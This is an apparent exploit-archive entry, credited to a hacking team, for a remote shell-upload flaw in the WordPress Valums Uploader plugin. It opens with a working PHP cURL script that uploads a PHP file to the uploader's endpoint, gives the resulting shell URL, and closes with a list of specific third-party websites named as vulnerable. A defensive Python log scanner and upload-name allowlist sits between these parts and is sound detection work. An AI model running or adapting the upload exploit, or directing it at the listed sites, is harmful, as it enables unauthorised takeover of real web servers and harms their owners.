The WordPress Valums Uploader plugin suffers from a remote shell upload vulnerability. Note that this finding houses site-specific data.
ff9d417dcdb72cecdfe6693ce266a4e1d5cd7e902fc64c64b4368480a4ecf888
# Exploit Title: Wordpress Valums Uploader Shell Upload Exploit
# Date: 4-1-2013
# Author: JingoBD
# Tested on: Windows 7 And Ubuntu
# Team: BANGLADESH CYBER ARMY
# Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, And All Of My BCA Friends. They Rockz. :D
ALSO ALL BANGLADESHI Hacker Team..
=================== EXPLOIT ====================
<?php
$uploadfile="bangla.php";
$ch = curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php
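The advisory above shows a multipart POST of a `.php` file to the uploader's `php.php` endpoint and the resulting script being reachable under `wp-content/uploads/`. The following is an added defender-side example, written for this page and not part of the original advisory or the plugin: it scans web-server access logs for the two observable signs of this pattern (a POST to a path ending in `valums_uploader/php.php`, and any request for a script file under `wp-content/uploads/`), and it shows the kind of filename allowlisting an upload handler needs to refuse such files in the first place. The log lines, IP addresses, theme path and file names are constructed for the example; the Apache combined log format and the path patterns are the only assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (Apache "combined" format), not from the
# advisory. Line 1 mirrors the POST the exploit makes, line 2 the uploaded
# script being fetched; lines 3 and 4 are benign traffic that must not alert.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jan/2013:10:15:32 +0000] "POST /wp-content/themes/example/framework/_scripts/valums_uploader/php.php HTTP/1.1" 200 45 "-" "curl/7.26.0"
198.51.100.2 - - [04/Jan/2013:10:16:01 +0000] "GET /wp-content/uploads/2013/01/bangla.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.9 - - [04/Jan/2013:10:17:45 +0000] "GET /wp-content/uploads/2013/01/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [04/Jan/2013:10:18:00 +0000] "GET /wp-content/themes/example/framework/_scripts/valums_uploader/php.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [ts] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Server-side script of the Valums uploader, wherever a theme or plugin ships it.
UPLOADER_RE = re.compile(r'/valums_uploader/php\.php$')
# Executable script types should never be served from the uploads directory.
UPLOADS_SCRIPT_RE = re.compile(
    r'^/wp-content/uploads/.*\.(php\d?|phtml|phar|phps)$', re.IGNORECASE
)


@dataclass
class Finding:
    ip: str
    ts: str
    path: str
    reason: str


def scan(log_text):
    """Return one Finding per log line that matches either indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        method = m['method']
        path = m['path'].split('?', 1)[0]  # compare the path without the query string
        if method == 'POST' and UPLOADER_RE.search(path):
            findings.append(Finding(m['ip'], m['ts'], path,
                                    'POST to valums_uploader/php.php upload endpoint'))
        elif UPLOADS_SCRIPT_RE.match(path):
            findings.append(Finding(m['ip'], m['ts'], path,
                                    'script file requested from wp-content/uploads'))
    return findings


# Mitigation side: a handler that stores files by a strict extension allowlist.
ALLOWED_EXT = {'jpg', 'jpeg', 'png', 'gif', 'pdf'}
SCRIPT_EXT = {'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'phps'}


def sanitize_upload_name(name):
    """Return a safe basename for storage, or None if the upload must be rejected."""
    base = name.replace('\\', '/').rsplit('/', 1)[-1]  # drop any directory part
    if '\x00' in base or base in ('', '.', '..'):
        return None
    parts = base.lower().split('.')
    if len(parts) < 2 or parts[-1] not in ALLOWED_EXT:
        return None
    # Reject double extensions such as shell.php.jpg: some Apache AddHandler
    # setups execute a file as PHP if *any* of its extensions is a script one.
    if any(p in SCRIPT_EXT for p in parts[:-1]):
        return None
    return base


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f'{f.ts} {f.ip} {f.path}: {f.reason}')
    for candidate in ('photo.jpg', 'bangla.php', 'shell.php.jpg', '../../x.png'):
        print(f'{candidate!r} -> {sanitize_upload_name(candidate)!r}')
```

Run the script as-is to see the two hits from the sample log; in practice point `scan()` at the real access log. The second indicator (a script served from the uploads tree) is worth keeping even after the uploader is patched, since it catches the artefact of a successful upload regardless of which endpoint delivered it. On the mitigation side, an upload directory that also has script execution disabled in the web server config makes the filename check defence-in-depth rather than the only barrier.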
Some Vulnerable Sites:
http://www.mmodels.ca/wp/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php
http://www.yellowfly.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php
http://www3.mhcable.com/v2/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.phps
=========================END======================
Thanks
http://facebook.com/bdcyberarmy